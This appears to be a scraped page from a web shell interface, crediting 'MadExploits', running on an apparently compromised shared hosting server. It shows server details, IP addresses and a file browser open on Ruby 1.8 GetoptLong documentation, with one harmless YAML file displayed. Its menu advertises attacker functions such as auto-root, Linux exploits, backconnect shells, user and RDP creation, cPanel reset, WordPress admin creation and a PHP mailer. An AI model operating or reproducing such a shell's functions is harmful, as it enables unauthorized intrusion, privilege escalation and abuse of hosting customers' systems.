Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
GetoptLong /
[ HOME SHELL ]
Name
Size
Permission
Action
AmbigousOption
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
InvalidOption
[ DIR ]
drwxr-xr-x
MissingArgument
[ DIR ]
drwxr-xr-x
NeedlessArgument
[ DIR ]
drwxr-xr-x
cdesc-GetoptLong.yaml
3.77
KB
-rw-r--r--
each-i.yaml
694
B
-rw-r--r--
each_option-i.yaml
234
B
-rw-r--r--
error_message-i.yaml
321
B
-rw-r--r--
get-i.yaml
650
B
-rw-r--r--
get_option-i.yaml
231
B
-rw-r--r--
new-c.yaml
1.03
KB
-rw-r--r--
ordering%3d-i.yaml
2.5
KB
-rw-r--r--
set_error-i.yaml
254
B
-rw-r--r--
set_options-i.yaml
382
B
-rw-r--r--
terminate-i.yaml
252
B
-rw-r--r--
terminated%3f-i.yaml
283
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get-i.yaml
--- !ruby/object:RI::MethodDescription aliases: - !ruby/object:RI::AliasName name: get_option block_params: comment: - !ruby/struct:SM::Flow::P body: Get next option name and its argument, as an Array of two elements. - !ruby/struct:SM::Flow::P body: The option name is always converted to the first (preferred) name given in the original options to GetoptLong.new. - !ruby/struct:SM::Flow::P body: "Example: ['--option', 'value']" - !ruby/struct:SM::Flow::P body: Returns nil if the processing is complete (as determined by STATUS_TERMINATED). full_name: GetoptLong#get is_singleton: false name: get params: () visibility: public
Close